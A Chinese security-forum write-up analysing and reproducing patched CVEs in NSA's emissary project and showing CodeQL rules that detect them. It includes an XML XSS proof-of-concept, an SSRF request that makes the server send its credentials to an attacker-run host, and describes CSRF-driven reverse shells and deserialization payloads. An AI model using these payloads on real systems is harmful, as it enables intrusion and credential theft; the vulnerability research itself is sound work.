问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
NSA emissary多个漏洞分析复现和CodeQL实践
漏洞分析
最近笔者除了在做漏洞分析外,也在学习CodeQL的使用,刚好可以用emissary项目来练手。
0x00 前言 ------- 先是Sonarsource的安全研究员在审计NSA的开源项目emissary v5.9.0版本的过程中发现了若干漏洞,其中包括: - Code Injection (CVE-2021-32096) - Arbitrary File Upload (CVE-2021-32094) - Arbitrary File Disclosure (CVE-2021-32093) - Arbitrary File Delete (CVE-2021-32095) - Reflected cross-site scripting (CVE-2021-32092) 后来在浏览Github安全实验室的博客时,看到@pwntester在Sonarsource安全研究员的基础上,使用CodeQL编写规则,在emissary项目中除了检测出以上漏洞外,还发现了新的漏洞: - Unsafe deserialization (CVE-2021-32634) - Server-side request forgery (CVE-2021-32639) 最近笔者除了在做漏洞分析外,也在学习CodeQL的使用,刚好可以用emissary项目来练手。 PS: 本文提到的漏洞,emissary项目官方均已发布修复版本。建议直接使用最新版本。 0x01 漏洞分析和复现 ------------ ### Reflected cross-site scripting (CVE-2021-32092) 这个XSS漏洞发生在一个文档上传功能里,上传文档后通过`/emissary/Document.action/{uuid}`接口来获取文档的信息,`uuid`参数对应的不同的文档。当`uuid`不存在时,返回一个`XML`格式的内容,提示`uuid`不存在, 但传入的`uuid`参数未经任何的安全过滤就原样显示在回显文本中,可导致反射型XSS。关键代码如下图: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-b0110dae6c774ea44507fdab0cb91081fe305f71.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-b0110dae6c774ea44507fdab0cb91081fe305f71.png) 由于返回的文本是XML格式,可在[XSS-Cheat-Sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)中找到在XML文件中执行的PoC,如下: ```html <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script> ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-3a88547ed443fdd492fd98027279a2b00f7da154.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-3a88547ed443fdd492fd98027279a2b00f7da154.png) 该漏洞使用CodeQL最新版本的默认规则集可以检测出来,如下图: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-9d1fb1d51b782dd13ba3839e79aea0df4f0e60ad.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-9d1fb1d51b782dd13ba3839e79aea0df4f0e60ad.png) 而如果使用较旧的版本(应该是今年6月份以前的版本),使用默认的规则集无法检测出该XSS,看CodeQL对应的提交记录,应该是之前没有考虑到响应类型为:`application/xml`,从而导致漏报(个人愚见,不一定对...)。另外,还针对XSS的误报方面进行了改进,忽略了响应类型为`application/json`的情况。对应的改进实现见:[XSS改进](https://github.com/github/codeql/pull/6162/commits) ### Arbitrary File Disclosure (CVE-2021-32093) 漏洞发生在接口`/emissary/ConfigFile.action`,该接口没有对传入的参数`ConfigItem`做任何安全校验和过滤,导致可读取服务器上任意文件。关键代码如下: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-031ef8b6e89bcf82c60ebe7b3190fb4d3a729a46.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-031ef8b6e89bcf82c60ebe7b3190fb4d3a729a46.png) [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-ab7c55ed4277c6f34c1dc853b4f76cc62bebf938.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-ab7c55ed4277c6f34c1dc853b4f76cc62bebf938.png) 示例如下,读取系统文件,及读取emissary的配置文件获取用户名/密码: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-4341aea2533dbc21c95af2073d386fbc05d0231d.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-4341aea2533dbc21c95af2073d386fbc05d0231d.png) [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-b62d6da4fc9902e72b23736e4f6a62f0cbcdd8c0.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-b62d6da4fc9902e72b23736e4f6a62f0cbcdd8c0.png) 该漏洞使用CodeQL的默认规则集可以检测出来,如下图: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-a2b02fe9e69e02d02fcfd2cb004b5de94ab92ee3.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-a2b02fe9e69e02d02fcfd2cb004b5de94ab92ee3.png) ### Code Injection (CVE-2021-32096) 该漏洞出现在接口`/emissary/Console.action`,该接口允许用户执行Ruby代码。关键代码如下: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-e4c27b9d8e11dce27832805048a0eae6c3eff6d8.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-e4c27b9d8e11dce27832805048a0eae6c3eff6d8.png) [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-779a9f5e30f7d38a56f71b35452f04180dc697f8.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-779a9f5e30f7d38a56f71b35452f04180dc697f8.png) [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-0e5d65b97481cb7ad8197832fa48c181a8371421.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-0e5d65b97481cb7ad8197832fa48c181a8371421.png) 这个是emissary提供的功能。另外,该接口需要登录后才能调用。但由于emissary的用户认证使用的是HTTP摘要认证(HTTP Digest authentication)(参考\[3\]),在浏览器端登录后的HTTP请求,会自动带上请求头`Authorization`,如下: ```php GET / HTTP/1.1 Host: 192.168.3.56:8001 Authorization: Digest username="emissary", realm="EmissaryRealm", nonce="6GNGeEbPjv0BCgLtxLiqHifkF1eNRMM3", uri="/", algorithm=MD5, response="daa5a9a9144b7665f5ff1f5585d3432f", qop=auth, nc=00000001, cnonce="9f3c3b06c42dba3b" ``` 这种认证方式可以被CSRF攻击。所以可构造页面让登录用户去访问,从而获取反弹shell,如[gif演示](https://github.com/fa1c0n1/m01e-wiki/blob/main/Web%E9%80%9A%E7%94%A8%E8%BD%AF%E4%BB%B6%E6%BC%8F%E6%B4%9E/java/nsa_emissary/pic/emissary_7.gif "gif演示")所演示(因为当前社区还不支持gif动态图)。 这个漏洞,使用目前CodeQL的默认规则集是检测不出来的,尽管默认规则集确实已覆盖了`javax.script.ScriptEngine.eval()`,所以应该是因为某种原因导致`source`和`sink`之间的通路断了。下面通过代码来分析下原因。 [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-da19371b35b52698364367dc4bdd42eb15d05c1c.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-da19371b35b52698364367dc4bdd42eb15d05c1c.png) `getOrCreateConsole(request)` 将调用 `RubyConsole.getConsole()`,其实现如下: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-0b3ccac979c00b0fc22aa29654d3796234d810c9.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-0b3ccac979c00b0fc22aa29654d3796234d810c9.png) 这里会启动一个线程,线程执行的代码见`RubyConsole.run()`: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-258b4cc7db762802d7c0270dee2505a8de780797.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-258b4cc7db762802d7c0270dee2505a8de780797.png) 当调用`rubyConsolePost()` 方法时,`RubyConsole.run()`由于 `stringToEval`为null,会执行`wait()`立马使当前线程进入挂起状态。 然后再回到接口的执行方法`rubyConsolePost()`,后面会执行`console.evalAndWait()`去执行Ruby代码: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-c55f98734aab694e662cbdc78244700aa822a239.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-c55f98734aab694e662cbdc78244700aa822a239.png) [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-5baf60f80e111477e7e0b914c88cd9e9b06a778c.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-5baf60f80e111477e7e0b914c88cd9e9b06a778c.png) 可以看到`evalAndWait()`方法里并没有直接调用`eval()`方法,而是将要执行的ruby代码字符串赋值给全局变量`stringToEval`,然后调用`notifyAll()`方法来唤醒所有等待状态的线程,所以`RubyConsole.run()`方法继续往下执行,调用`javax.script.ScriptEngine.eval()`去执行Ruby代码。 综上可判断:使用默认的规则集检测的过程中,从`/Console.action`到`console.evalAndWait()`,由于`javax.script.ScriptEngine.eval()`没有在`console.evalAndWait()`里被调用,所以这个数据流就断了。所以检测不出来。 因此,得通过编写CodeQL额外的污点步骤,把这个数据通路给连接起来。这里直接引用了@pwntester编写的CodeQL规则,如下: ```php class NotifyWaitTaintStep extends TaintTracking::AdditionalTaintStep { override predicate step(DataFlow::Node n1, DataFlow::Node n2) { exists(MethodAccess notify, MethodAccess wait, SynchronizedStmt notifySync, SynchronizedStmt waitSync | notify.getMethod().hasQualifiedName("java.lang", "Object", ["notify", "notifyAll"]) and notify.getAnEnclosingStmt() = notifySync and wait.getMethod().hasQualifiedName("java.lang", "Object", "wait") and wait.getAnEnclosingStmt() = waitSync and waitSync.getExpr().getType() = notifySync.getExpr().getType() and exists(AssignExpr write, FieldAccess read | write.getAnEnclosingStmt() = notifySync and write = n1.asExpr() and read.getAnEnclosingStmt() = waitSync and read.getField() = write.getDest().(FieldAccess).getField() and read = n2.asExpr() ) ) } } ``` 可将这段代码添加到CodeQL默认的代码注入规则文件`ql/java/ql/src/experimental/Security/CWE/CWE-094/ScriptInjection.ql`中,再运行查询,就能检测出该漏洞了,如下图: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-4e651d58385479ff0c515b87bc379fed6b1c44ea.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-4e651d58385479ff0c515b87bc379fed6b1c44ea.png) ### Unsafe deserialization (CVE-2021-32634) 该漏洞发生在接口`/emissary/WorkSpaceClientEnqueue.action`,代码如下图: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-2be03a987331d2f5f8183814b840b866cacc01f2.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-2be03a987331d2f5f8183814b840b866cacc01f2.png) 可以看到参数`WorkSpaceAdapter.WORK_BUNDLE_OBJ`在第52、53行被读取并反序列化。而且emissary依赖了`commons-collections-3.2.1`,所以可以使用`ysoserial`生成`CC`链的payload进行反序列化攻击。由于这个接口也是登录后才可调用,因此可配合CSRF进行利用。 该漏洞使用CodeQL的默认规则集可以检测出来,如下图: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-8831756f6b62fd6f3dae4a73f4e0d3141a93ece2.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-8831756f6b62fd6f3dae4a73f4e0d3141a93ece2.png) ### Server-side request forgery (CVE-2021-32639) 这里有两个接口存在SSRF漏洞,分别是`/emissary/RegisterPeer.action`和`/emissary/AddChildDirectory.action`。 这两处SSRF漏洞,使用CodeQL的默认规则集可以检测出来,如图: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-97067d353aa590fe948620760a95b79dca2a0e63.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-97067d353aa590fe948620760a95b79dca2a0e63.png) [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-a5059977c245d1499ec23d49dcb268afb9e96544.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-a5059977c245d1499ec23d49dcb268afb9e96544.png) #### 接口 /RegisterPeer.action 漏洞输入点在`directoryName`参数。 可构造payload如下: ```php POST /emissary/RegisterPeer.action HTTP/1.1 Host: 127.0.0.1:8001 Content-Type: application/x-www-form-urlencoded directoryName=foo.bar.baz.http://172.20.10.3:5000/&targetDir=http://localhost:8001/DirectoryPlace ``` SSRF一般用于未授权访问、扫描或攻击目标的内部网络。但是这里@pwntester根据emissary的实际情况给出了另一种攻击场景。通过分析代码发现,emissary使用Apache的HttpClient库来向内部网络发起http请求,它从自身配置中获取身份凭证,并将身份凭证设置到名为`CRED_PROV`的凭证提供者对象中,然后带着这个身份凭证向目标服务发起Http请求。在这个过程中,并没有配置emissary客户端使用哪种身份认证机制(`HTTP Basic Authentication`或`HTTP Digest Authentication`),所以判断:使用哪种身份认证机制应该是根据HTTP服务器的响应来决定的。具体代码如下: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-eb06f225a4a255a01f52d2e11d19b3198aacbe69.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-eb06f225a4a255a01f52d2e11d19b3198aacbe69.png) 因此,我们就可以架设一个HTTP基础认证的服务器,然后通过emissary的SSRF漏洞,让emissary客户端使用HTTP基础认证方式去访问我们的服务器,这样,我们在恶意服务器端就能获取用户身份凭证的明文数据(Base64编码)。 经实践,确实是这样。 1、首先编写并启动我们的HTTP Basic Authentication服务器; 2、使用上面的payload,对emissary执行SSRF攻击,如下图,会带着身份凭证的明文数据(Base64编码)向我们的目标服务器发起请求: [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-981111f1965dd182b31b1e847416038b21f1106a.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-981111f1965dd182b31b1e847416038b21f1106a.png) 因此emissary项目的维护者在修复SSRF漏洞的同时,还指定了emissary客户端使用HTTP摘要认证机制。如下图,详见:[修复代码](https://github.com/NationalSecurityAgency/emissary/commit/79ca5608c4f77d9a5c8a4996e204377c158a6976#diff-c988041bf4d686dbcce23218e54188558f0116513ff30d161d958482a7c5f1c4) [![](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-34944972744ca6c071d0ac47f4e5582a9e910d88.png)](https://shs3.b.qianxin.com/attack_forum/2021/08/attach-34944972744ca6c071d0ac47f4e5582a9e910d88.png) #### 接口 /AddChildDirectory.action `/AddChildDirectory.action`接口同理,就不展开说了。 小结 -- - CodeQL在一定程度上,依赖于安全人员的技术能力。但随着该项目的活跃,安全社区会有越来越多的人提交优质的CodeQL查询规则,来增强它的默认规则集。 - 总之,CodeQL无论是在代码审计挖洞,还是分析Nday方面,都是非常值得学习的工具。 Reference --------- \[1\] <https://blog.sonarsource.com/code-vulnerabilities-in-nsa-application-revealed> \[2\] <https://securitylab.github.com/research/NSA-emissary/> \[3\] <https://blog.csdn.net/andrewpj/article/details/45727853>
发表于 2021-08-31 19:47:13
阅读 ( 6012 )
分类:
漏洞分析
0 推荐
收藏
0 条评论
请先
登录
后评论
m01e
4 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!